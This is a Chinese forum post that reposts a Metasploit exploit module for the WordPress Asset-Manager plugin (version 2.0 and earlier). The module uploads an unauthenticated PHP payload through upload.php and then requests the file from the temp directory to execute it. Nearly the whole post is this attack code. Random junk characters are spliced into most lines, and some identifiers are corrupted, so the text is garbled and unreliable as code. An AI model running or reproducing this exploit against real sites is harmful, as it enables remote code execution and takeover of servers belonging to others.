这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。
; Y! f' Q3 E- Q" K% ?: d8 ]0 M0 q
##) T9 N6 W! \# {. r4 E' v& |* ~7 n
# This file is part of the Metasploit Framework and may be subject to" Q2 J# z! y. E+ V+ J: s
# redistribution and commercial restrictions. Please see the Metasploit+ s! F) m8 C4 S8 ?; C0 K3 d. ?
# Framework web site for more information on licensing and terms of use.; `, r8 ]# B8 q4 Z. f
# http://metasploit.com/framework/" P& D/ C/ @# v# |4 [
##
- z/ {+ t y4 R+ X- o
9 e7 o: X7 {- Z5 d' A5 u, Xrequire 'msf/core'4 A2 X/ k; ]/ n$ f5 T% m
require 'msf/core/exploit/php_exe'$ z; _$ n2 k6 |& J
0 d4 R0 z. C- p `# S3 rclass Metasploit3 < Msf::Exploit::Remote
- ]$ ~2 {' R/ M( d$ l% I& ^ Rank = ExcellentRanking. r$ S/ U5 B. p8 f7 |$ t5 c g8 p3 _- w
: x- N; @. L2 Y$ `. ^" h include Msf::Exploit::Remote::HttpClient) N' k9 U: R- {
include Msf::Exploit: hpEXE
7 ^# Q" |: {7 B! \9 _. `
: ^6 I0 Y7 y. p: z3 l def initialize(info = {})
5 I" ^0 H b$ G5 v super(update_info(info,* b1 L# m! n' T- l8 C
'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability',
4 {& z V2 g" t! a* d/ g) p: ] R 'Description' => %q{
/ j2 `! [0 L( p4 Z* [& X This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
0 l7 J5 [2 W& v3 S2 Q" _1 _: i plugin. By abusing the upload.php file, a malicious user can upload a file to a
8 n6 _* N p1 Q9 ^ temp directory without authentication, which results in arbitrary code execution.
% w" p9 l' [/ L+ N+ z2 m. z- D },
: Z1 x! Z% _ I, ^! t+ t3 J, B 'Author' =>
7 a& _" X9 e$ G W; z [
9 G( k. Y' U' D# D) j, V 'Sammy FORGIT', # initial discovery9 j( l' j; g8 u" n- F5 a! q
'James Fitts <fitts.james[at]gmail.com>' # metasploit module3 u9 i, ^/ W( K8 ?) [: \
],! p1 F. z; y1 U1 f' R4 @
'License' => MSF_LICENSE,
! e! `0 p1 f$ p/ h% S7 }1 t, e, y7 Q4 e 'References' =>
2 f2 x c. ~- F+ s6 E [* I/ r8 g% ?+ h+ h1 `( u9 D4 V
[ 'OSVDB', '82653' ],
: B2 Q: f" w# @# ^7 r [ 'BID', '53809' ],/ Z( @7 N* G$ Z; f
[ 'EDB', '18993' ],
; U1 G1 }9 G8 Q( S. q [ 'URL', 'http:// www.myhack58.com /' ]
* Z9 _5 L9 _9 n6 @0 l ],
) B$ [! k: ~# Y3 Q+ a 'Payload' =>
3 a& q# O) K; X1 I' P {
* v, K* O6 Y, X# B 'BadChars' => "\x00",
4 _9 P/ h9 W! S, | z9 r6 m0 N/ L3 ` },+ N3 c4 x$ V, h7 ~' g# X
'Platform' => 'php', o' f" v% |! k# t+ T: I, O
'Arch' => ARCH_PHP,9 {/ Y3 _8 `' l7 X4 N7 N' F; y. |
'Targets' => ^* w$ k2 L8 Z, p
[
5 l5 ~& q# k" `7 R M% v* s [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
/ J6 s: B3 U* z( ^5 g# q" g [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
4 r$ j: O' D$ V( m% h4 y ],' _4 M# f5 T! O5 u. m, U3 C- L( |
'DefaultTarget' => 0,
" r( W, N$ E/ E, m- L 'DisclosureDate' => 'May 26 2012'))9 q4 T ?7 T0 p5 }; V v( F
) N/ k# c+ J8 Z! N. J
register_options(( `6 E$ a8 h0 H# ~5 N/ I: Y F
[- B* j9 Q1 ]9 ]* x7 e- ^
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
$ _: Z6 J+ {. T1 S; o: t& x ], self.class)8 y3 r" ]& V' R) p3 d
end
7 R5 ^( L, H( t- q5 S
, b0 O/ m4 h/ z/ E: @& }" W def exploit
/ g* p- e0 l% h6 J0 \ uri = target_uri.path2 x, E) }6 q( v, h( B
uri << '/' if uri[-1,1] != '/'
& w% v3 D3 ~/ R! [7 p, y peer = "#{rhost}:#{rport}"
7 l$ d1 q/ X9 V0 c% v S+ Q7 } payload_name = "#{rand_text_alpha(5)}.php"
, w! T; c" z4 J2 o( V php_payload = get_write_exec_payload(:unlink_self=>true)
8 o, p' W4 Z0 D9 ~; z$ a
0 k6 _" Y$ @* {8 n6 H2 o data = Rex::MIME::Message.new
U# Z8 I- r8 B2 L" Q" s data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
: J2 t8 _9 k. B5 P7 O# d+ g post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
; ^3 n6 o( k+ K# H" h% D 3 V( o1 a: e0 {1 j
print_status("#{peer} - Uploading payload #{payload_name}")3 [( ~# x7 |$ X' R1 F% G% _' E
res = send_request_cgi({
) H7 M$ `2 ]* _0 }3 A: P. c 'method' => 'POST',
- s& f3 w. a1 _, ~$ n 'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php",
7 r) B, E' N; R: ^" ~' g" ~5 Z2 z* _ 'ctype' => "multipart/form-data; boundary=#{data.bound}",
" t/ E! t0 o) w. v 'data' => post_data3 E) p+ i! N9 F5 ^. N
})) \/ O, D+ A6 b$ O
0 n9 \' ~4 _0 {$ v x* }8 u
if not res or res.code != 200 or res.body !~ /#{payload_name}/ [/ }: _5 n$ Q" ^4 {7 m
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
?5 I1 o: N, c/ N: a. D8 Hend
L" C. N$ M; A" {! B( Z ( B& w" Z- G) \( Q# P1 U
print_status("#{peer} - Executing payload #{payload_name}")# {+ S" V, u/ ?' m$ N
res = send_request_raw({
! p6 m0 y1 r( S7 T* x, D4 j 'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
8 Y+ l! O9 m$ y 'method' => 'GET'7 T& p5 ^, \! n' l7 C/ a2 G
})' T9 l3 u. ]8 A
* n8 G3 u* j9 q if res and res.code != 200
8 T' b: ^9 I3 W9 ]* p/ \ fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
' z1 j( _" n+ O- e end
1 D( s- i( F0 Y' |6 D; R) ^! p6 ^ end
$ B1 \. U5 w# B# f% r. f+ @end
' J" u1 H1 f; N |
发表于 2012-12-31 09:22:33
收藏
支持
反对